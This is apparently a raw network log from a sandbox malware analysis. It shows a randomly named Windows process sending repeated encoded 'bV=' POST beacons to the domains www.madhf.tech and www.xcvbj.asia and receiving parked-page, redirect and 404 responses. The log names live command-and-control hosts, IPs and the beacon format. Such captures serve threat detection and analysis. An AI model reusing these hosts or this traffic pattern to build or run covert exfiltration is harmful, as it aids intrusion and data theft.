Dec 2, 2024 15:24:56.919828892 CET | 753 | OUT | POST /3iym/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 203
    Connection: close
    Host: www.madhf.tech
    Origin: http://www.madhf.tech
    Referer: http://www.madhf.tech/3iym/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Data Raw: 62 56 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 6b 48 4a 30 70 72 50 61 4b 7a 76 66 53 66 4e 46 42 50 30 72 4a 66 34 7a 6c 79 58 69 37 6f 77 4d 68 4f 31 6b 38 53 2f 42 49 79 63 6b 68 69 4c 66 31 66 52 34 63 66 36 64 45 68 68 79 71 61 7a 70 39 35 6c 34 69 6d 34 2b 62 33 69 2b 5a 74 6e 47 53 61 66 51 7a 59 6d 67 69 32 61 47 4e 4d 2f 64 4d 35 7a 66 72 4e 62 42 79 75 31 65 6a 6b 69 78 34 69 4b 33 64 52 69 79 48 4e 51 6a 78 2b 51 53 51 68 41 43 74 6d 66 38 6b 47 75 74 54 5a 30 55 70 33 52 74 6e 31 76 34 4d 78 4e 43 31 50 64 73 73 56 44 38 72 63 39 2b 6c 64 5a 45 31 6a 6a 61 76 4e 58 31 54 2b 6c 74 75 73 3d
    Data Ascii: bV=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3Rtn1v4MxNC1PdssVD8rc9+ldZE1jjavNX1T+ltus=
Dec 2, 2024 15:24:58.149471045 CET | 871 | IN | HTTP/1.1 200 OK
    date: Mon, 02 Dec 2024 14:24:57 GMT
    server: Apache
    set-cookie: __tad=1733149497.5221456; expires=Thu, 30-Nov-2034 14:24:57 GMT; Max-Age=315360000
    vary: Accept-Encoding
    content-encoding: gzip
    content-length: 576
    content-type: text/html; charset=UTF-8
    connection: close
    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
    Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


Session ID: 18 | Source IP: 192.168.2.5 | Source Port: 49942 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 728 | Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:24:59.584525108 CET | 773 | OUT | POST /3iym/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 223
    Connection: close
    Host: www.madhf.tech
    Origin: http://www.madhf.tech
    Referer: http://www.madhf.tech/3iym/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Data Raw: 62 56 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 77 77 4d 44 57 31 6e 2b 71 2f 55 49 79 63 73 42 6a 44 62 31 65 64 34 63 54 63 64 41 39 68 79 71 2b 7a 70 39 4a 6c 34 31 79 35 6b 72 33 6b 32 35 74 6c 4c 79 61 66 51 7a 59 6d 67 6d 66 53 47 4e 30 2f 63 38 4a 7a 65 4b 4e 59 4a 53 75 32 64 6a 6b 69 6e 34 6a 42 33 64 52 63 79 46 70 36 6a 7a 32 51 53 53 70 41 43 2f 4f 59 32 6b 47 6f 77 44 59 4c 51 34 65 4e 68 48 77 6b 38 74 77 51 56 56 36 6e 67 36 6b 70 6d 4a 55 56 74 46 78 68 55 6d 72 55 4c 66 73 2b 76 77 75 56 7a 35 34 46 73 41 33 31 30 69 47 4e 38 37 42 36 49 2b 65 6c 54 4e 2f 58
    Data Ascii: bV=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFxhUmrULfs+vwuVz54FsA310iGN87B6I+elTN/X
Dec 2, 2024 15:25:00.822520971 CET | 871 | IN | HTTP/1.1 200 OK
    date: Mon, 02 Dec 2024 14:25:00 GMT
    server: Apache
    set-cookie: __tad=1733149500.1835738; expires=Thu, 30-Nov-2034 14:25:00 GMT; Max-Age=315360000
    vary: Accept-Encoding
    content-encoding: gzip
    content-length: 576
    content-type: text/html; charset=UTF-8
    connection: close
    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
    Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


Session ID: 19 | Source IP: 192.168.2.5 | Source Port: 49948 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 728 | Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:02.252502918 CET | 1790 | OUT | POST /3iym/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1239
    Connection: close
    Host: www.madhf.tech
    Origin: http://www.madhf.tech
    Referer: http://www.madhf.tech/3iym/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Data Raw: 62 56 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 34 77 50 77 65 31 6e 5a 47 2f 53 34 79 63 76 42 6a 41 62 31 66 48 34 63 37 59 64 48 31 78 79 6f 32 7a 6d 2b 78 6c 70 30 79 35 71 62 33 6b 30 35 74 6d 47 53 61 77 51 7a 4a 68 67 69 7a 53 47 4e 30 2f 63 2b 42 7a 4f 72 4e 59 45 79 75 31 65 6a 6b 6d 78 34 6a 70 33 64 59 6e 79 46 73 50 6a 41 4f 51 52 79 5a 41 42 4c 75 59 30 45 47 71 78 44 59 54 51 34 43 6b 68 48 39 62 38 74 55 36 56 57 71 6e 6c 2b 34 7a 31 49 4a 4c 2f 54 56 33 59 78 53 35 53 70 59 39 76 68 75 6b 37 62 52 6e 6c 42 72 62 2b 31 79 57 36 4b 6b 4e 64 59 76 2f 65 70 48 5a 5a 41 2f 64 46 56 4f 2b 49 35 6c 4d 42 69 4d 6e 54 2f 39 56 46 47 4e 5a 42 53 67 54 51 69 46 67 48 4e 68 62 33 4d 4a 33 4b 6c 38 6b 42 33 68 5a 63 76 6d 4d 63 33 44 31 77 6e 65 2b 6f 39 76 34 73 44 54 72 49 35 69 32 6d 75 30 68 56 55 6e 67 57 36 62 57 4a 6f 5a 48 55 79 46 72 57 6b 51 38 78 33 79 7a 62 61 32 75 44 76 35 30 6a 2f 47 72 2b 50 6b [TRUNCATED]
    Data Ascii: bV=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 [TRUNCATED]
Dec 2, 2024 15:25:03.546399117 CET | 871 | IN | HTTP/1.1 200 OK
    date: Mon, 02 Dec 2024 14:25:03 GMT
    server: Apache
    set-cookie: __tad=1733149503.5138422; expires=Thu, 30-Nov-2034 14:25:03 GMT; Max-Age=315360000
    vary: Accept-Encoding
    content-encoding: gzip
    content-length: 576
    content-type: text/html; charset=UTF-8
    connection: close
    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
    Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


Session ID: 20 | Source IP: 192.168.2.5 | Source Port: 49955 | Destination IP: 103.224.182.242 | Destination Port: 80 | PID: 728 | Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:04.921197891 CET | 495 | OUT | GET /3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    Host: www.madhf.tech
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 2, 2024 15:25:06.141623974 CET | 1236 | IN | HTTP/1.1 200 OK
    date: Mon, 02 Dec 2024 14:25:05 GMT
    server: Apache
    set-cookie: __tad=1733149505.1376155; expires=Thu, 30-Nov-2034 14:25:05 GMT; Max-Age=315360000
    vary: Accept-Encoding
    content-length: 1490
    content-type: text/html; charset=UTF-8
    connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 62 56 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 62 30 76 6e 33 4c 4e 48 72 42 6e 57 61 4f 52 65 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 43 42 71 53 4b 65 54 52 4c 6b 2f 66 61 42 59 55 52 57 38 5a 65 46 74 2f 4a 6e 6e 58 4c 75 6c 5a 75 34 34 62 6f 58 41 77 4f 72 64 79 68 55 6c 43 2f 4f 4a 34 45 38 59 73 64 55 62 37 6f 47 47 43 6d 4e 52 68 78 78 67 35 79 46 68 41 3d 3d 26 77 7a 63 50 3d 69 [TRUNCATED]
    Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff"
Dec 2, 2024 15:25:06.141657114 CET | 526 | IN | Data Raw: 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f
    Data Ascii: text="#000000"><div style='display: none;'><a href='http://www.madhf.tech/3iym/?bV=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZu44boXAwOrdyhUlC/OJ4E8YsdUb7oGGCmNRhxxg5yFhA==&wzcP=iLdd&fp=-3'>Click he


Session ID: 21 | Source IP: 192.168.2.5 | Source Port: 49972 | Destination IP: 149.88.81.190 | Destination Port: 80 | PID: 728 | Process: C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:12.496956110 CET | 753 | OUT | POST /hkgx/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate, br
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 203
    Connection: close
    Host: www.xcvbj.asia
    Origin: http://www.xcvbj.asia
    Referer: http://www.xcvbj.asia/hkgx/
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
    Data Raw: 62 56 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 64 63 33 2f 30 72 52 6a 35 44 6c 66 44 55 4f 46 72 6e 4f 6d 4b 4d 61 45 32 38 42 2f 44 6a 43 38 47 72 51 69 57 6c 4a 74 46 70 65 56 69 6b 44 48 53 67 6d 41 6d 63 75 6a 4d 49 67 32 6b 68 4e 45 67 67 59 44 31 6a 56 63 6f 51 38 74 6b 73 37 31 63 74 6c 37 4c 69 46 69 72 44 6a 78 6e 45 39 51 45 4d 53 46 52 46 54 36 59 64 31 64 50 55 73 4d 35 46 55 6d 51 76 68 43 74 47 56 72 4a 5a 72 4e 54 6c 4b 53 6a 46 4a 4b 42 4e 54 46 66 37 39 6e 70 35 4e 6d 2b 4e 2f 4c 69 7a 31 45 63 5a 4c 6a 38 69 4a 76 75 79 72 45 59 76 41 53 36 30 79 5a 6f 6c 76 53 67 75 6d 67 63 66 38 3d
    Data Ascii: bV=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm+N/Liz1EcZLj8iJvuyrEYvAS60yZolvSgumgcf8=
Dec 2, 2024 15:25:14.074155092 CET | 691 | IN | HTTP/1.1 404 Not Found
    Server: nginx
    Date: Mon, 02 Dec 2024 14:25:13 GMT
    Content-Type: text/html
    Content-Length: 548
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49981 | 149.88.81.190 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:15.165941954 CET | 773 | OUT | POST /hkgx/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Connection: close
Host: www.xcvbj.asia
Origin: http://www.xcvbj.asia
Referer: http://www.xcvbj.asia/hkgx/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 57 38 47 50 41 69 58 67 6c 74 4c 4a 65 56 6f 45 44 43 50 77 6d 62 6d 63 6a 63 4d 4b 45 32 6b 68 5a 45 67 68 49 44 31 77 39 66 6f 41 38 76 38 63 37 7a 59 74 6c 37 4c 69 46 69 72 48 4b 57 6e 43 56 51 46 34 57 46 51 6b 54 39 52 39 31 65 5a 45 73 4d 79 6c 55 71 51 76 67 6e 74 48 59 4f 4a 63 76 4e 54 6e 43 53 69 51 39 56 4b 4e 54 66 62 37 38 54 71 6f 64 71 35 37 37 69 6e 44 45 38 43 72 37 65 35 55 34 46 30 51 6a 73 4c 50 73 71 71 6e 36 75 35 56 4f 37 36 4e 32 51 43 49 70 31 74 63 51 56 31 67 69 37 39 2f 71 6d 54 50 55 6b 47 6c 67 63
                                                                                                                  Data Ascii: bV=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPsqqn6u5VO76N2QCIp1tcQV1gi79/qmTPUkGlgc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49987 | 149.88.81.190 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2024 15:25:17.830518007 CET | 1790 | OUT | POST /hkgx/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Connection: close
Host: www.xcvbj.asia
Origin: http://www.xcvbj.asia
Referer: http://www.xcvbj.asia/hkgx/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 4f 38 47 34 6f 69 57 48 52 74 4b 4a 65 56 32 55 44 44 50 77 6e 4c 6d 63 37 59 4d 4b 34 49 6b 6a 68 45 68 42 55 44 69 78 39 66 69 41 38 76 31 38 37 79 63 74 6c 4c 4c 6a 31 63 72 44 57 57 6e 43 56 51 46 35 6d 46 47 46 54 39 58 39 31 64 50 55 74 44 35 46 56 39 51 76 35 61 74 48 4e 37 4a 49 62 4e 53 48 53 53 6b 69 6c 56 56 39 54 5a 63 37 38 4c 71 6f 51 30 35 37 50 41 6e 44 41 61 43 70 62 65 35 53 46 4e 75 55 72 58 59 4a 34 74 6b 78 53 77 68 56 47 68 34 2b 4b 43 47 4c 39 6c 74 76 6f 74 6a 48 71 59 32 4c 6d 75 51 75 4d 31 58 51 64 4b 5a 67 61 35 4a 78 78 71 63 32 59 77 65 34 62 77 50 68 61 57 55 78 76 6b 51 6e 63 54 4a 43 39 65 67 51 43 70 44 57 55 35 35 6e 44 6f 43 75 30 6c 38 49 4d 59 6b 65 30 30 68 37 45 4d 43 61 78 74 59 4e 6c 49 4e 36 69 50 77 33 4e 37 64 52 30 38 67 48 6b 61 6a 46 6d 6f 68 4f 62 6e 59 51 49 64 62 65 46 55 46 41 31 4d 6a 68 63 52 47 57 62 52 59 71 48 [TRUNCATED]
Data Ascii: bV= [TRUNCATED]
Dec 2, 2024 15:25:19.424402952 CET | 691 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 14:25:19 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
